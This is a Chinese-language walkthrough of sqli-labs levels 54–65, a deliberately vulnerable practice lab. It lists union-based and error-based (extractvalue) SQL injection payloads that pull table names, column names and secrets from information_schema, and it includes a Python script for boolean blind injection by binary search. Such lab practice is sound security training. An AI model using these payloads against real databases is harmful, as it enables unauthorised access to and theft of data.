sqli-labs刷题(54-65)

54 无报错 无过滤 union

ID:1
ID:1'
ID:1'--
ID:0' union select 1,2,3--
ID:0' union select 1,2,database()--
ID:0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--
ID:0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='ildvytwz6d'--
ID:0' union select 1,2,secret_54Z4 from ildvytwz6d--

55

ID:1
ID:1'
ID:1'-- 
ID:1')-- 
ID:1")-- 
ID:1)-- 
ID:0) union select 1,2,3-- 
ID:0) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'-- 
ID:0) union select 1,2,group_concat(column_name) from information_schema.columns where table_name='evu5o2kvg8'-- 
ID:0) union select 1,2,secret_ZIST from evu5o2kvg8-- 

56

')

57

"

58 报错

ID:1'
ID:1' and extractvalue(1,concat(0x7e,(select user())))-- 
ID:1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')))-- 
ID:1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='97g4e9dy69')))-- 
ID:1' and extractvalue(1,concat(0x7e,(select secret_KZUH from 97g4e9dy69)))-- 

59

无闭合报错

60

")闭合报错

61

'))闭合报错

各个闭合方式的布尔盲注

62

脚本模板

import requests

url0="http://sql.test/Less-62/?id=1') and "
databasename=''#这里我提前手工查到了databasename的长度为10，用length()
for i in range(1,10):
    min = 33
    max = 127
    while(abs(min-max)>1):
        mid = (min + max)//2
        url = url0 + "(ascii((mid(database(),{},1)))>{})--+".format(i,mid)
        print(url)
        req = requests.get(url=url)
        if ("Angelina" in req.text):
            min = mid
        else:
            max = mid
        # print(abs(min-max))
    databasename+=chr(max)
    print(databasename)

63 单引号闭合

'

64 双括号

))

65 单括号

)